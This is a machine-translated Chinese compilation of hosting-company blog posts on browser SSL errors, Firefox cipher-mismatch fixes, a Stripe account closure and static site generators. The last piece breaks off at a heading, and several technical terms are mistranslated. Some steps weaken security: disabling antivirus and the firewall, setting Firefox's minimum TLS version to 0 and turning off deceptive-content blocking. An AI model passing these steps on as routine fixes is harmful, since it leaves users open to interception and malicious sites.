在各种浏览器和平台上修复 SSL 连接错误的 8 种方法
为您的网站获取安全套接字层(SSL) 证书并进行设置从未如此简单。但是你仍然会遇到 SSL 连接错误,即使在正确安装了你的证书并强制流量通过 HTTPS 之后。在许多情况下,这些错误信息会把用户吓跑。
了解导致 SSL 错误的原因将有助于防止它们出现在您的网站上。根据你看到的信息和你使用的浏览器或操作系统,你也会知道遇到这种情况时该怎么做。
在本文中,我们将探索什么是 SSL 连接错误及其主要原因。我们还将讨论它们最常见的类型,以及如何对它们进行故障排除。
我们开始吧!
查看我们的视频指南来修复 SSL 连接错误
什么是 SSL 连接错误?
An SSL connection error in Firefox.
在浏览网页时,您可能会遇到几种类型的 SSL 连接错误。其中一些错误是由于服务器端的问题,而另一些是由于本地配置问题。
Kinsta 把我宠坏了,所以我现在要求每个供应商都提供这样的服务。我们还试图通过我们的 SaaS 工具支持达到这一水平。
概括地说,SSL 连接错误会阻止您通过安全超文本传输协议(HTTPS) 安全地浏览网站。您的浏览器可能允许您继续连接,但在大多数情况下,它会告诉您这样做的风险由您自己承担。如果没有有效的 SSL 证书,恶意方可以拦截您与您试图查看的网站交换的任何数据。
您可能遇到的一些最常见的 SSL 连接错误包括:
- NET:ERR _ CERT _ AUTHORITY _ INVALID
- NET::ERR _ CERT _ COMMON _ NAME _ INVALID
- NET::ERR_CERT_REVOKED
- SSL 握手失败
- 错误 _ SSL _ 过时 _ 版本
- 错误 _ SLL _ 协议 _ 错误
每种类型的 SSL 连接错误都指向不同的原因。当您遇到这样的问题时,您的浏览器会显示一条特定的消息,告诉您为什么会看到它:
需要注意的是,不同浏览器的错误信息可能会有所不同。上面的图片来自 Firefox,而下面的图片是当我们使用 Chrome 打开同一个网站时弹出的:
An SSL connection error in Chrome.
如前所述,并非所有的 SSL 连接错误都源于您的服务器配置问题。您的网站可以拥有完全有效的 SSL 证书,但用户在访问它时仍可能遇到错误。
在接下来的几节中,我们将向您展示当您试图访问一个网站时遇到 SSL 连接问题时应该怎么做。
如何修复 SSL 连接错误(8 种方法)
如果你不负责一个网站,那么在修复服务器端 SSL 连接错误时,你几乎无能为力。但是,由于本地设备或浏览器配置的问题,可能会出现一些问题。
我们将向您展示如何使用各种浏览器、移动操作系统和社交媒体平台来修复导致 SSL 连接错误的本地问题。
让我们开始修理吧!
1.如何修复谷歌 Chrome 中的 SSL 连接错误
如果你在 Google Chrome 中遇到 SSL 连接错误,有几个快速修复方法可以实现。
首先,确保你运行的是最新版本的 Chrome。你可以从浏览器本身更新 Chrome ,或者你可以从谷歌 Chrome 的网站下载并安装最新版本。
接下来,检查系统的时间和日期是否同步。如果您的设备时间不正确,您可能会在整个 web 上遇到 SSL 连接问题,因为一些 SSL 证书依赖内部系统时钟进行验证。您计算机上不正确的时间或日期会导致错误,因为您的浏览器无法验证这些证书。
在 Windows 上,您可以通过打开设置菜单并选择时间&语言选项来固定时间和日期:
访问窗口的‘时间&语言’设置。
在下一个屏幕上,确保自动设置时间和自动设置时区选项都已启用。或者,您可以手动选择您的时区,并启用手动设置日期和时间选项:
在 Windows 中同步时间。
如果你在 macOS 上使用 Chrome,点击屏幕左上角的苹果图标打开系统偏好菜单。选择日期&时间选项,启用自动设置日期和时间设置:
MAC OS 的“日期&时间”设置。
一旦你确定了日期和时间,尝试访问 Chrome 中显示 SSL 连接错误的网站。如果问题仍然存在,继续清除你的 Chrome 缓存和 cookies 。为此,打开设置菜单,点击清除浏览数据。
将弹出一个窗口,允许您选择要清除的数据。如果您正在使用基本设置,选择 Cookies 和其他站点数据和缓存图像和文件,然后点击清除数据按钮:
清除 Chrome 中的缓存和 cookies。
您可以尝试的另一个修复方法是清除操作系统中的 SSL 板。要在 Windows 中执行此操作,请打开开始菜单并搜索互联网选项。点击出现的结果,会弹出一个互联网属性窗口。跳转到内容,点击清除 SSL 状态:
清除 Windows 中的 SSL 石板。
清除 SSL 名单将删除本地存储在您的计算机上的所有证书。下次重新加载网站时,如果出现 SSL 连接错误,浏览器将尝试重新验证其证书,这样做可能会清除错误。
如果您使用的是 macOS,那么清除 SSL 协议的工作方式会有所不同。打开实用程序菜单,进入钥匙串访问。在左侧菜单中选择钥匙链下的系统选项,您将看到系统本地存储的所有 SSL 证书的概述:
访问 macOS 的 SSL 协议。
您可以单独选择证书并手动删除它们。如果您发现了您尝试访问的网站的证书,请先删除该证书,然后检查 SSL 连接错误是否仍然存在。
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
在这个阶段,如果其他都失败了,暂时禁用你的杀毒软件和防火墙。我们建议将此作为最后手段,因为在大多数情况下,您的防病毒软件不会导致 SSL 连接问题。
如果您尝试了每一种修复方法,但都不起作用,您可以认为 SSL 连接问题出在服务器上。
2.如何修复 Firefox 中的 SSL 连接错误
在 Firefox 中修复 SSL 连接错误的工作方式与其他浏览器基本相同。您可以按照上一节中的说明来实现以下修复:
- 检查系统的日期和时间,并进行调整。
- 清除您的本地 SSL 记录。
如果这两种解决方案都不起作用,那么是时候清空你的 Firefox cookies 和缓存了。为此,进入选项菜单,跳转到隐私&安全标签。然后点击 Cookies 和站点数据下的清除数据按钮:
在火狐清理站点数据。
再次尝试访问出现 SSL 连接错误的网站。如果你的浏览器无法建立连接,检查是否有新版本的火狐浏览器可以更新。
3.如何修复 Safari 中的 SSL 连接错误
到目前为止,我们已经对跨操作系统的 SSL 连接错误进行了多次修复。如果你使用的是 Safari,首先按照谷歌浏览器部分给出的相同说明进行操作:
- 检查系统的日期和时间,并进行调整。
- 在 macOS 中清除您的本地 SSL 板。
如果 SSL 连接错误仍然存在,您可以继续操作,清除您的 Safari cookies 和缓存。如果您使用的是 iMac、Macbook、iPhone 或 iPad,具体说明如下:
- 打开 Safari 设置菜单。
- 点击清除历史记录。
解决这个问题后,尝试访问之前给你一个 SSL 连接错误的网站。这个错误现在应该消失了,除非您正在处理服务器端的配置问题。
4.如何修复 iPhones 和 iPads 上的 SSL 连接错误
在 iPhone 或 iPad 上修复 SSL 连接错误的过程与在 macOS 上的相同。首先,您需要检查设备的日期和时间是否同步。要访问移动设备的日期和时间设置:
Kinsta 的所有托管计划都包括来自资深 WordPress 开发者和工程师的 24/7 支持。与支持我们的财富 500 强客户的专家聊天,并检查我们的计划!
- 打开设置 app,选择常规 > 日期&时间。
- 检查自动设置选项是否启用。如果不是,就打开它。
- 手动检查您的设备是否使用了正确的时区。
更新日期和时间设置后,您可以进入清除浏览器的 cookies 和缓存。为此,打开设置 app,选择 Safari > 清除历史和网站数据:
清除 iOS 上的 Safari 浏览数据。
如果你已经在你的 iOS 设备上安装了不同的浏览器,这个过程应该是相似的。
不幸的是,最新版本的 iOS 已经删除了在 iPhone 或 iPad 上清除 SSL 记录的选项,所以这不是一个可行的解决方案。如果上面的修复都不起作用,您可以假设问题出在服务器端。
5.如何修复 Android 上的 SSL 连接错误
修复 Android 上的 SSL 连接错误相对简单。首先,继续检查您的时间和日期设置,看看它们是否准确。
打开设置 app,点击综合管理 > 日期时间。然后检查自动日期和时间设置是否启用:
更新 Android 中的日期和时间设置。
值得注意的是,像 iOS 一样,Android 不包括清除 SSL 记录或删除单个证书的选项。要修复 SSL 连接错误,你可以做的就是清除你的 Chrome 浏览数据。为此:
- 打开 Chrome 浏览器并访问其设置菜单。
- 转到隐私和安全。
- 点击清除浏览数据。
- 选择浏览器的 Cookies 和站点数据和缓存图像和文件选项,然后点击清除数据。
清除 Chrome 网站数据后,检查 SSL 连接错误是否仍然存在。如果是的话,很可能是服务器端的配置问题。
6.如何修复脸书上的 SSL 连接错误
如果您在脸书上遇到 SSL 连接错误,您可以确定这不是服务器端的问题。这意味着您正在处理一个本地配置问题。以下是您应该实施的修复:
- 调整您的本地时间和日期设置。
- 清除浏览器的缓存和 cookies。
- 清除操作系统的 SSL 名单或删除脸书的任何本地证书。
你可以在本文的 Google Chrome 部分找到关于在 Windows 和 macOS 上调整日期和时间设置的说明。我们也有关于为 Chrome、Firefox 和 Safari 清除浏览器 cookies 和缓存的说明。
7.如何修复 Gmail 上的 SSL 连接错误
使用移动应用程序访问 Gmail 时,您不会遇到 SSL 连接错误。但是,如果您使用 Chrome、Firefox 或 Safari 访问 Gmail 的网络服务,SSL 错误可能会弹出。在这种情况下,您应该:
- 调整您的本地时间和日期设置(查看上面的 Google Chrome 部分获取说明)。
- 清除浏览器的缓存和 cookies。
- 清除操作系统的 SSL 名单或删除 Gmail 的任何本地证书。
如果其他一切都失败了,你可以使用移动应用程序访问 Gmail,同时尝试暂时禁用防火墙或将浏览器更新到最新版本。
8.如何修复 YouTube 上的 SSL 连接错误
YouTube 上的 SSL 连接错误可能是由于您的操作系统或浏览器中的本地配置错误造成的。如果您在 YouTube 中遇到 SSL 错误:
- 调整您的本地时间和日期设置(查看上面的 Google Chrome 部分获取说明)。
- 清除浏览器的缓存和 cookies。
- 清除操作系统的 SSL 名单或从 YouTube 中删除任何本地证书。
在这篇文章的前面,我们提供了为 Chrome、Firefox 和 Safari 清除浏览器缓存和 cookies 的说明。同样,您可以通过查看前面几节中的 Chrome 和 Safari 说明,找到如何清除 SSL 记录的分步指南。
摘要
SSL 连接错误有很多种形式和大小。如果你正在处理一个服务器端的错误,除了等待网站的所有者来修复它或者继续一个不安全的连接之外,你通常无能为力。
也就是说,您可以尝试几种可能解决此问题的本地配置修复,包括:
- 调整您的时间和日期设置。
- 清除浏览器的 cookies 和缓存。
- 清除操作系统的 SSL 记录。
如果您的网站仍然面临 SSL 连接错误,请在下面留下评论。Kinsta 客户也可以联系我们的支持团队来修复任何 SSL 错误。
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
修复“SSL_ERROR_NO_CYPHER_OVERLAP”错误的 3 种方法
你可能会在网上遇到各种各样与浏览器相关的问题。如果你使用的是 Mozilla Firefox 浏览器,其中一个潜在的问题就是SSL _ ERROR _ NO _ CYPHER _ OVERLAP错误。和任何错误一样,它既令人沮丧又令人担忧,尤其是当你不知道是什么原因造成的时候。
您可以采取一些简单的步骤来诊断和解决此问题。更好地理解这个错误背后的原因将有助于您立即修复它。
在本帖中,我们将解释SSL_ERROR_NO_CYPHER_OVERLAP错误的含义及其一些可能的原因。然后,我们将向您介绍如何使用三种可能的方法来修复它。
我们开始吧!
更喜欢看视频版?
什么是“SSL_ERROR_NO_CYPHER_OVERLAP”错误?
与其他浏览器错误不同,SSL _ ERROR _ NO _ CYPHER _ OVERLAP错误专门发生在 Firefox 上。谷歌 Chrome 有一个类似但略有不同的版本,它的消息是“ERR _ SSL _ VERSION _ OR _ CIPHER _ MISMATCH”。
需要在这里大声喊出来。Kinsta 太神奇了,我用它做我的个人网站。支持是迅速和杰出的,他们的服务器是 WordPress 最快的。
简而言之,当 Firefox 无法从您试图访问的网站获取安全数据时,就会出现这种错误。通常,当你试图访问的网站较旧,没有更新的安全套接字层(SSL)保护时,就会发生这种情况。
如果你不熟悉的话, SSL 是你的电脑和网站服务器之间的加密技术。如果您遇到这个错误消息,这意味着您的浏览器不能在它们之间安全地通信。需要注意的是,SSL 本质上与传输层安全性(TLS) 是一样的,稍后将再次提到。
“SSL_ERROR_NO_CYPER_OVERLAP”错误的潜在原因
除了错误信息,Firefox 可能还会显示“数据的真实性无法验证”如果是这样,该消息可能还会建议您联系网站所有者。然而,虽然问题可能是由网站引起的,但也可能与浏览器有关。
更具体地说,有可能是你的 Firefox 版本或你的特定浏览器设置导致了网站和你的电脑之间的错误通信。另一个潜在原因可能是 TLS 或 SSL3 设置被禁用或配置错误。
此外,您的浏览器和服务器必须使用相同的加密密码进行连接。由于存在漏洞,一些密码(如 RC4)不再被主流浏览器支持。如果您尝试连接的网站的服务器使用不支持的加密方法,您可能会看到此错误。
一些用户报告在安装 Cloudflare 后遇到这个错误。这通常是因为浏览器不支持 Cloudflare 的 SSL 证书使用的服务器名称指示(SNI)协议。
修复“SSL_ERROR_NO_CYPHER_OVERLAP”错误的 3 种方法
现在我们对这个问题有了更多的了解,是时候解决它了。下面是三个潜在的解决方案,你可以用来解决 Firefox 中的 SSL_ERROR_NO_CYPHER_OVERLAP 错误消息。
1.更新你的火狐浏览器
解决这个错误的第一个也是最简单的方法是确保你使用的是最新版本的 Firefox 浏览器。为了让你的互联网体验尽可能的顺畅,这是你应该经常做的事情。
要将你的火狐浏览器更新到最新版本,打开浏览器,点击汉堡菜单图标,然后导航到帮助 > 关于火狐:
浏览器菜单中的“关于火狐”选项。
如果有任何可用的更新,Firefox 应该立即开始下载:
火狐浏览器通知用户更新正在下载。
下载完成后,点击重启以更新 Firefox 按钮:
火狐的“重启更新”选项。
或者,你可以从火狐网站获得最新版本的浏览器。在下载它之前,记得从你的计算机上卸载你的当前版本。
要在 Windows 上这样做,点击 Windows + R 键,然后在搜索框中键入“appwix.cpl”并按下回车。在程序管理器下,找到 Firefox,右键点击,选择卸载。
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
在 macOS 上,点击顶部工具栏中的转到>应用程序。然后把 Mozilla Firefox 拖到垃圾桶里删除。
2.重置您的 TLS 和 SSL3 设置
如果你使用的是最新的 Firefox 版本,或者更新它没有帮助,下一步你可以尝试重置你的 TLS 和 SSL3 设置。一些网站需要这些协议来建立连接。因此,如果您的被禁用,这可能是您看到“SSL_ERROR_NO_CIPHER”错误的原因。
要重置它们,请在 Firefox 浏览器中打开一个新标签,并在地址栏中键入“about:config”。您可能会看到一条消息说,“这可能会使您的保修失效!”或者“小心行事”:
来自火狐的一个“小心行事”的安全警告通知。
这个警告是 Firefox 防止你不小心对你的浏览器设置作出重大改变的一种方式。点击接受风险并继续继续。
在下一个高级首选项屏幕的搜索栏中,键入“tls”:
火狐高级首选项屏幕的搜索栏。
键入以下内容将生成所有 TLS 配置的列表:
Firefox 中 TLS 配置列表。
寻找任何加粗的值,因为它们是最近发生变化的值。对于任何加粗的值,右击它们并选择 Reset 将其恢复到默认设置。
需要一个给你带来竞争优势的托管解决方案吗?Kinsta 为您提供了令人难以置信的速度、一流的安全性和自动伸缩功能。查看我们的计划
接下来,对 SSL3 重复相同的过程。在搜索栏中键入“ssl3”,并重置任何最近更改的值:
Firefox 中 SSL3 配置列表。
此外,确保以下两项设置为假:
- security . SSL 3 . dhe _ RSA _ AES _ 128 _ sha
- security . SSL 3 . dhe _ RSA _ AES _ 256 _ sha
出于安全目的,阻止这些设置至关重要。
3.绕过您的安全协议和浏览器配置
一般来说,我们建议您不要绕过浏览器安全协议,因为它们的目的是防止您访问不安全的网站。但是,如果您知道您尝试访问的站点是安全的,您可以通过手动输入密码验证来绕过此错误。
为此,请返回 Firefox 浏览器的 about:config 屏幕。再次在搜索栏中键入“tls”。从列表中,导航到 security.tls.version.min :
Locating the security.tls.version.min preference in the Firefox browser.
单击最右边的铅笔图标编辑项目,然后输入“0”作为值。接下来,对security . TLS . version . fallback-limit 重复相同的过程。
你可以绕过加密协议的最后一个方法是改变你浏览器的隐私设置。为此,打开你的 Firefox 菜单,然后导航到选项 > 隐私&安全:
火狐设置中的
隐私&安全菜单选项。
在安全部分下,取消选择拦截危险和欺骗性内容:
火狐设置的“安全”部分。
希望在这一点上,您已经成功地解决了错误。如果不是,那么很可能是服务器端的问题。最常见的情况是,当一个站点使用 RC4 专用的密码套件时,就会出现这种情况。
由于存在漏洞,包括 RC4 在内的一些密码不再被主流浏览器支持。您可以运行 SSL 检查来验证您的 SSL 证书没有使用过时的密码。
如果你不是网站所有者,剩下唯一要做的就是联系他们,确保他们知道问题所在。
摘要
被拒绝访问你想访问的网站一点都不好玩。当您面前的错误消息像SSL _ ERROR _ NO _ CYPHER _ OVERLAP错误一样令人困惑时,这可能会特别令人沮丧。幸运的是,您可以采取一些简单的步骤来解决这个与 Firefox 相关的问题:
- 将您的 Firefox 浏览器更新至最新版本。
- 重置您的 TLS 和 SSL3 设置。
- 绕过您的安全协议和浏览器配置。
关于解决此错误,您有什么问题吗?请在下面的评论区告诉我们!
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
创业公司应该避免条纹吗?我们如何找回我们的账户
更新:本帖最初写于 2014 年。这篇文章发表几个小时后,Stripe 的很多人联系了我们,并恢复了我们的账户。从那以后我们再也没有遇到过任何问题。跳到后续。
为什么我们选择条纹
近年来,我们听到了许多关于 Stripe 的消息,但作为一家欧洲公司,我们在很长一段时间内都无法签约。直到他们最终开始接受英国公司。自 2007 年以来,我们一直是 PayPal 的大用户,无论是作为商家还是买家,在他们的平台上交易超过 100 万美元。我们与 PayPal 支持团队有过公平的争议和长时间的聊天,但没有什么不可收拾的。
PayPal 有两个主要问题:
- 他们的声誉,很多客户告诉我们,他们想尽一切办法避免用贝宝支付。
- 他们的 API 是一场噩梦;它过于复杂,缺乏 2014 年应该默认的功能。长话短说,我们很高兴用 Stripe 构建了 Kinsta 的信用卡受理程序。
注册过程很简单,尽管你必须提交很多文件,这是可以理解的。当你在等待你的 live 帐户的确认时,你已经可以开始为他们的 API 构建你的客户端了,他们为最常见的语言提供了库,这些语言是基于现代编程标准编写的,因此,它们非常容易使用。这并不奇怪,因为 Stripe 的诞生源于创始团队对当时可用的支付处理器的失望,他们打算颠覆这个行业。
他们做到了:这个 API 不像 PayPal 那样让人觉得只是一种事后的想法,使用它是一种真正的乐趣。使用 Stripe 设置并开始接收付款非常简单。
然后问题开始了
我不记得上一次我们不得不在网上处理欺诈性支付是什么时候了,也许我们是幸运的(或者也许 PayPal 的欺诈保护根本不是那么糟糕)。在我们开始在我们的网站上使用 Stripe(包括 PayPal 和比特币)大约一周后,第一个骗子来了。有趣的是,他支付了服务费用(显然是用偷来的信用卡),却从未使用过这项服务!那笔款项被退回一周后,由于我们的团队已经认为可疑,我们立即退款。
随着我们交易数量的增加,欺诈活动也在增加。同样,奇怪的是,除了一个人(他试图使用一个帐户发送电子邮件,但他很快被抓住并被禁止)以外,所有被盗信用卡滥用者都只想付给我们钱,然后什么也不做,这在我看来似乎不合逻辑。如果他们想测试一堆卡号,他们可以通过一项收费 1 美元左右的服务来完成,如果他们想用它来发送垃圾邮件或做其他事情,为什么他们不至少尝试一下呢?
不幸的是,Stripe 收取 15 美元的退款费用,因此我们在每笔交易上都在赔钱,在我看来,Stripe 甚至应该在交易发生之前就停止这些交易。例如,有一个人使用了同一个电子邮件地址,在 15 分钟内尝试了来自 3 个不同大陆的卡片。除非他是闪电侠,否则这是不可能的,这对于我所知道的所有支付处理商来说都是一个巨大的警告,但 Stripe 没有眨一下眼睛。
由于我们正在亏损,而 Stripe 没有提供任何帮助来阻止这些事情,我们开始寻找一家专门从事在线欺诈防范的公司。这里有几个我们听说过但还没有机会去验证的例子:MaxMind 的 minFraud 、 Sift Science 和 Signifyd 。即使对小企业来说,它们也非常实惠。我真的不知道为什么 Stripe 不与这些公司合作,对我来说这似乎是显而易见的。
在我们完成上述任何服务的实施之前,一天晚上(我想强调一下晚上的部分),我们收到了 Stripe 发来的一封电子邮件,内容如下:
嗨,
感谢您注册 Stripe!
很遗憾,目前我们需要停止为 kinsta.com 提供服务。目前,Stripe 只能支持客户纠纷风险较低的用户-在审查您提交的信息和网站后,您的网站似乎比我们目前所能支持的风险更高。遗憾的是,我们无法代表您接受任何额外付款。
就这样。
T2】我想强调的是,我们的合法用户没有任何争议,只有被盗信用卡的所有者通过他们的银行要求退款,这是你所期望的。然而,我在任何情况下都没有想到的是,Stripe 会在半夜关闭我们的账户,没有任何合理的通知。或者帮忙。这与之前我们在 Stripe 上经历的一切完全不同。
他们本可以给我们一些建议,告诉我们如何最大限度地减少欺诈,我们本可以改变我们的表单或任何东西。再加上一个警告,比如“如果这种情况继续下去,我们将不得不暂停你的帐户”,在最终决定前几周也是不错的。最重要的是,他们没有回答关于这个问题的询问。这是一个如何不处理客户关系的完美案例。
是我们的问题吗?在谷歌上搜索了一下,发现这是如今在 Stripe 做生意的一种相当常见的方式。看这里,这里这里,这里这里,这里这里。如果你需要更多,你可以自己搜索一下,并特别注意评论部分。
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
事实证明我们很幸运,我们有程序员,可以在短时间内转移到另一个 API。当日常销售和运输有形产品的人被诈骗时,这可能会破坏他们的整个业务,有时还会破坏他们的生活(正如我们在上面链接的主题中所读到的)。认为实施一个良好的欺诈检测系统可以解决所有这些问题,然而他们却对此无所作为,这令人难以置信。
外卖食品
不久前,Stripe 还只是一家为所有新客户感到高兴的初创公司,旨在颠覆 PayPal 处理客户服务和整体业务的方式。几年后,他们变成了同样的无名企业。即使当你扩展的时候很困难,你也不应该忘记你最初的目标,这样你才能保持真实的自我,并提供用户最初注册的价值。这应该是每个与客户打交道的人最重要的一点,包括 Kinsta。
当你在建立一家你想长期经营的公司时,不要忘记你目前的小客户(我还没有自大到认为自己在 Stripe 眼里除了微小之外什么都不是)可以在任何时候变得巨大,毕竟这是我们正在谈论的互联网!我们生活在超大规模的时代。
同样重要的是,作为一家初创公司,你要为客户提供多种支付方式。不是所有人都喜欢贝宝,但也不是所有人都信任使用信用卡的网上商家——还有一些人喜欢使用比特币。如果你现在正在创业,最好为“下一件大事”做好准备。比特币可能是其中之一。
我们真诚地希望比特币(或基于比特币奠定的基础的其他东西)在未来几年成为主流,它让这一切变得如此简单(没有争议,没有退款,费用低得离谱)。虽然现在我们会和其他几家信用卡处理公司谈谈(但我们倾向于 Braintree ),一旦我们有了解决方案,我们会更新这篇文章。在那之前,我们只能建议你远离 Stripe,他们不再是以前的伟大创业公司了。
跟进——几小时后
我们都会犯错。我们只是一个小型的托管创业公司,但我们不时会犯错误,我可以想象照顾成千上万的客户有多难。不过,这不是借口,你必须积极主动,如果你犯了错误,你最好承认并从中吸取教训。
Struggling with downtime and WordPress problems? Kinsta is the hosting solution designed to save you time! Check out our features
这正是 Stripe 所做的,我很高兴地说,我们重新激活了我们的帐户,公司的许多友好的人联系了我们,并确保我们不会感到落后。我甚至有机会与帕特里克·科利森和 T4 的联合创始人聊天,帕特里克·是 T2 条纹公司的联合创始人,安迪·杨是条纹公司英国分部的负责人。这些人正在建立一家价值超过 10 亿美元的公司,但仍然花时间亲自联系我们,现在这就是模范客户服务。
当你处理大量的客户时,你必须有一个(高)水平的自动化,否则你将不得不操作一个大到可以填满一个城市的客户支持团队。自动化从来都不是完美的,作为一个在搜索引擎优化(SEO)行业工作了五年的人,我对被算法搞砸并不陌生。
在谷歌的情况下,我们习惯于无法接触任何人,我们唯一的选择是掸掉身上的灰尘,重新开始。然而,我并不指望我们作为付费客户的公司会有同样的表现。在我看来,这是最令人伤心的事情:无法为你的问题寻求帮助,以及缺乏与商业伙伴的沟通。
外卖
如果你直接与客户打交道,客户服务就是一切,在当今的社交媒体时代更是如此。Stripe 不是唯一的在线支付处理器,就像他们在 PayPal 的阴影下成长一样(PayPal 没有提供足够的客户支持,使开发者很难集成他们的服务),他们可能会被当前或未来的竞争对手淘汰,这些竞争对手可能会以相同的定价水平提供更好的支持和/或更好的产品。在今天所有相互联系的世界里,每天都有巨头崛起和倒下。
坏消息和差评比好消息传播得快得多,这是事实。你必须尽可能地监控社交媒体。不管你喜不喜欢,关于你的品牌的讨论正在发生,你唯一的选择是加入或者视而不见,假装社交媒体不存在。现在,如果你想建立一个长期的业务,这不是一个真正的选择。
在我看来,要想创业成功,你必须具备三样东西:有价值的支持、你所在领域最好的产品(或服务)和有竞争力的价格。
然而,客户支持就是一切。有可能创始人和管理层在联系支持团队时甚至不知道客户面临的问题。或者一夜之间,账户立即被关闭。不时地直接询问客户的反馈,并与他们一起努力使你的产品变得更好,这一点很重要。
金斯塔所在的行业(虚拟主机)因糟糕的客户服务而臭名昭著。我想在过去,很容易组装一个好的服务器盒子,并在上面放置尽可能多的客户,拿走他们的钱,当他们抱怨时,你让他们觉得他们没有资格获得任何支持,因为服务太便宜了。
尽管 Kinsta 在我们目前的所有竞争对手中提供了最好的虚拟主机性能,但这只是成功秘诀的 10%。我认为是附加值(备份、安全性、自定义管理功能等。)是另外的 10%,另一个 80%是客户支持。每个了解 Linux 的人都可以组装一个托管服务器,他们中的一些人甚至可以构建出色的服务器,但如果他们不提供狂热的支持(我希望 Rackspace 不会因为使用他们的商标术语而起诉我们……)这是远远不够的。
摘要
正如我前面提到的,我们真的很喜欢条纹。作为我们团队的首席开发人员,我认为这是自 PayPal 以来在线支付领域发生的最好的事情。他们犯了一个错误,对他们来说可能是一个小错误,但对我们来说却是一个大错误,当我指出他们的错误时,他们会承认错误,并尽他们所能去弥补。我很乐意称他们为商业伙伴。
更新:快进 5 年,我们仍然对 Stripe 感到满意。事实上,你可以看看我们是如何利用条纹雷达将信用卡诈骗减少 98%的。
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
2022 年 5 大静态站点发电机(以及何时使用)
许多网站页面是动态的。这意味着一个页面的内容会随着会话的不同而变化,这取决于谁在加载它,他们是登录还是注销,以及其他几个因素。
如果你的网站没有做到这一点,那么你就是在处理静态页面。
静态站点没有任何动态内容。在很多情况下,这可以转化为更快的加载时间和更好的网站整体性能。了解动态站点和页面的优缺点将有助于您决定何时使用它们是有意义的。
本文将介绍什么是静态站点生成器,以及何时应该使用它们。我们还将讨论静态站点的利与弊,并且我们将向您介绍目前您可以使用的五个顶级生成器。
我们开始吧!
什么是静态站点生成器?
从技术上来说,你不需要使用“生成器”或任何内容管理系统(CMS) 来创建一个静态页面。如果你熟悉 HTML 和 CSS ,你可以使用你最喜欢的文本编辑器毫不费力地创建一个页面:
文本编辑器中的一个 HTML 文档。
或者,你可以依靠 web 框架,如 Bootstrap 来访问高级的 HTML 、 CSS 和 JavaScript 库,你可以用它们来创建静态和动态网站:
自举主页。
静态站点生成器提供了第三种更简单的选择。它们通常包括各种各样的工具,可以轻松地创建网站、设计风格、创建内容、发布内容以及根据需要更新页面。
如果你对网站开发不熟悉,那么你可能需要像静态站点生成器这样的工具来帮助你实现你的愿景。
总的来说,大多数流行的生成器提供了广泛的功能,使您的工作更容易,包括:
- 对 Markdown 语言的支持:大多数生成器不包括成熟的文本编辑器。相反,他们使用降价语言,有时甚至包括额外的定制降价语法。
- 内置布局和模板选项: 设计和 s 设计一个网站往往是最具挑战性的构建过程。这就是为什么生成器倾向于包含内置模板和布局选项。
- 支持多种类型的内容:根据您使用的生成器,它应该支持各种类型的内容,比如博客文章、页面、图库等等。
- 内置搜索引擎优化功能:没有合适的搜索引擎优化(SEO) ,任何现代网站都不会成熟。如果你正在考虑——或者已经在使用——一个不提供 SEO 特性或者附加组件的生成器,你最好换一个新工具。
需要注意的是,大多数静态网站生成器都假设你已经有了一个基本的网站开发背景。有些选项相对来说对初学者比较友好,但是它们仍然需要您熟悉一些概念,比如命令行、Markdown 语言等等。
为什么要使用静态站点生成器(利弊)
你可能会奇怪,既然有像 WordPress 这样的工具可用,为什么还会有人使用复杂的静态站点生成器。
这完全取决于具体情况的使用、个人偏好和性能。
在绝大多数情况下,静态网站的加载速度会比动态网站快得多。这是因为您的服务器必须处理的请求要少得多,而且不涉及数据库。每个访问者都会看到相同的页面,所有的数据都被嵌入到静态站点生成器输出的代码中。
一些开发者也更喜欢处理静态站点生成器,而不是打包了太多功能的复杂 CMS。站点生成器倾向于精简,在某些情况下,它们是高度模块化的。这意味着需要处理的臃肿问题更少,需要掌握的功能更少,尤其是如果您只对创建特定页面感兴趣的话。
静态网站与动态网站
当然,不是所有的网站都应该是静态的。那么,您如何知道什么时候这是满足您需求的正确方法呢?
以下是一些不一定需要动态的网站示例:
虽然静态网站的想法听起来可能有局限性,但是在页面上不引入任何动态元素的情况下,您可以做很多事情。
然而,任何网站需要一个数据库是不可能的。这意味着你不能使用静态网站生成器来创建网上商店,带有评论区的博客文章,带有用户注册的网站,等等。
如果你不需要动态功能,使用静态网站生成器将会给你带来比大多数即时可用的 CMS 更好的网站性能。
我们说“开箱即用”是因为你可以做很多事情来优化像 WordPress 这样的 CMS。根据我们的经验,一个优化良好的 WordPress 网站可以和一个静态网站一样快(前提是你还拥有出色的主机)。
如果你只是出于性能考虑而选择使用静态站点生成器,那么考虑一些 CMS 选项可能是值得的。
另一方面,如果你确信你的网站不需要动态功能,剩下的就是找到合适的工具。
5 个最佳静态站点生成器
